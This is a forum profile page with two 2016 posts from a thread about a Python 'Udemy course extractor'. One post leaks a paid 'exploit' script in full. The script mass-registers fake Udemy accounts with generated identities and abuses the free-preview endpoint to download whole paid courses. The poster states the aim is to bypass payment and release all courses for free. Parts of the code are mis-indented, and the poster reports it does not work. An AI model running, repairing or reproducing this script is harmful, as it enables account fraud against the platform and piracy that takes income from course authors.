Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - MadJack

Pages: [1]
1
Scripting Languages / Re: [Python] Udemy course extractor
« on: January 26, 2016, 07:23:35 pm »
Quote from: TeamVega on January 26, 2016, 03:41:22 pm
register on udemy using a fake email, click on start Free Preview and then run the utility, it will download in the background all the videos.

Thanks a lot man. This technique works (tested with udemy-dl Linux version)!

2
Scripting Languages / Re: [Python] Udemy course extractor
« on: January 25, 2016, 10:27:31 pm »
Thanks a lot for the scripts. Can someone add the captions download feature please? I really need them. I also bought the "Udemy Paid Course Downloader" exploit from 0day.today (150$) but it doesn't work so I decided to leak and publish the script here:
Code: [Select]
This Tool Bypasses any Paid Udemy Course and Download it Without Paying a Single Peny.
Requirments: Full Course URL
Example: https://www.udemy.com/become-an-android-developer-from-scratch/
ONLY.
Usage info:
This Tools is Coded in Python So You'll Need to Have Python Installed and Some Python Libraries on Your PC.
Then all You Got To Do is to Run The Tool and Feed it The Course URL.


Secret Code:
#!/usr/bin/env python
# -*- coding: utf8 -*-
'''
Before You Run The Tool You Must Have Those Libraries Installed
BeautifulSoup , Fake-Factory , requests



Download Links:
requests: https://pypi.python.org/packages/source/r/requests/requests-2.3.0.tar.gz
BeautifulSoup: https://pypi.python.org/packages/source/b/beautifulsoup4/beautifulsoup4-4.3.2.tar.gz
Fake-Factory: https://pypi.python.org/packages/source/f/fake-factory/fake-factory-0.4.0.tar.gz

How To Install:
Extract Each Folder Separatedly , Open cmd , cd into New Directories , finally execute "python setup.py build&python setup.py install" if on windows ... and if on linux execute "python setup.py build;python setup.py install"

For any Error Report @ http://fb.me/eve.dized
'''
import requests, urllib, sys, re, os, json, urllib2, cookielib
from bs4 import BeautifulSoup
from faker import Factory
try:
    from urllib import urlretrieve
except:
    from urllib.request import urlretrieve


class Session:
    headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0',
               'X-Requested-With': 'XMLHttpRequest',
               'Referer': ' http://www.udemy.com/'}

    def __init__(self):
        self.session = requests.Session()

    def get(self, url):
        return self.session.get(url, headers=self.headers)

    def post(self, url, data):
        return self.session.post(url, data, headers=self.headers)


session = Session()


def get_csrf_token(url):
    response = session.get(url)
    soup = BeautifulSoup(response.text)
    return soup.find_all('input', {'name': 'csrf'})[0]['value']


def register():
cj = cookielib.CookieJar()
httper = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
httper.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
csrf_grabber = httper.open('https://www.udemy.com/join/signup-submit/')
csrf_value = re.findall('csrf: \'(.*)\'',csrf_grabber.read())[0]
fake = Factory.create()
fake_name = fake.name()
fake_email = fake.email()
fake_password = fake_email
register_request = httper.open('https://www.udemy.com/join/signup-submit/','locale=en_US&isSubmitted=1&csrf='+csrf_value+'&fullName='+urllib.quote_plus(fake_name)+'&email='+urllib.quote_plus(fake_email)+'&password='+urllib.quote_plus(fake_password)+'&timeZone=Africa%2FHarare&displayType=json')
register_json_response = json.loads(register_request.read())['returnUrl']

if register_json_response=='https://www.udemy.com/user/complete-signup/':
print "[+] Fake Auth Generated & Registered Successfully: name="+fake_name+"; email="+fake_email+"; password="+fake_password+";"
return fake_email
else:
print "[-] Could Not Register New User ... Try Again"


def login(username, password):
    login_url = 'https://www.udemy.com/join/login-submit'
    csrf_token = get_csrf_token('https://www.udemy.com/join/login-popup')
    payload = {'isSubmitted': 1, 'email': username, 'password': password,
               'displayType': 'json', 'csrf': csrf_token}
    response = session.post(login_url, payload).json()
    if 'error' in response:
        print(response['error']['message'])
        sys.exit(1)


def get_course_id(course_link):
    response = session.get(course_link)
    matches = re.search('data-course-id="(\d+)"', response.text)
    return matches.groups()[0]


def parse_video_url(lecture_id):
    embed_url = 'https://www.udemy.com/embed/{0}'.format(lecture_id)
    html = session.get(embed_url).text

    data = re.search(r'\$\("#player"\).jwplayer\((.*?)\);.*</script>', html,
                     re.MULTILINE | re.DOTALL).group(1)
    video = json.loads(data)

    if 'playlist' in video and 'sources' in video['playlist'][0]:
        source = video['playlist'][0]['sources'][0]
        return source['file']
    else:
        return None


def get_video_links(course_id):
    course_url = 'https://www.udemy.com/api-1.1/courses/{0}/curriculum?fields[lecture]=@min,completionRatio,progressStatus&fields[quiz]=@min,completionRatio'.format(course_id)
    course_data = session.get(course_url).json()

    chapter = None
    video_list = []

    lecture_number = 0
    chapter_number = 0
    session.get('https://www.udemy.com/course/preview-subscribe/?courseId='+course_id)
    for item in course_data:
        if item['__class'] == 'chapter':
            chapter = item['title']
            chapter_number += 1
            lecture_number = 1
        elif item['__class'] == 'lecture' and item['assetType'] == 'Video':
            lecture = item['title']
            try:
                lecture_id = item['id']
                video_url = parse_video_url(lecture_id)
                video_list.append({'chapter': chapter,
                                   'lecture': lecture,
                                   'video_url': video_url,
                                   'lecture_number': lecture_number,
                                   'chapter_number': chapter_number})
            except:
                print('Cannot download lecture "%s"' % (lecture))
            lecture_number += 1
    return video_list


def sanitize_path(s):
    return "".join([c for c in s if c.isalpha() or c.isdigit() or c in ' .-_,']).rstrip()


def mkdir(directory):
    if not os.path.exists(directory):
        os.makedirs(directory)


def dl_progress(num_blocks, block_size, total_size):
    progress = num_blocks * block_size * 100 / total_size
    if num_blocks != 0:
        sys.stdout.write(4 * '\b')
    sys.stdout.write('%3d%%' % (progress))


def get_video(directory, filename, link):
    print('[+] %s  <======> ' % (filename)),
    mkdir(directory)
    os.chdir(directory)
    if not os.path.exists(filename):
        urlretrieve(link, filename, reporthook=dl_progress)
    os.chdir('..')
    print ' Finished'


def udemy_dl(username, password, course_link):
    login(username, password)
    course_id = get_course_id(course_link)

    for video in get_video_links(course_id):
        directory = '%02d %s' % (video['chapter_number'], video['chapter'])
        filename = '%03d %s.mp4' % (video['lecture_number'], video['lecture'])

        directory = sanitize_path(directory)
        filename = sanitize_path(filename)

        get_video(directory, filename, video['video_url'])

    session.get('http://www.udemy.com/user/logout')


def main():
    link = raw_input("[+] Udemy Course Url: ")
    login = register()
    udemy_dl(login, login, link)


if __name__ == '__main__':
    main()

If somebody is able to fix and update the exploit please PM me! :P I want to download all the courses and release them for free.

Pages: [1]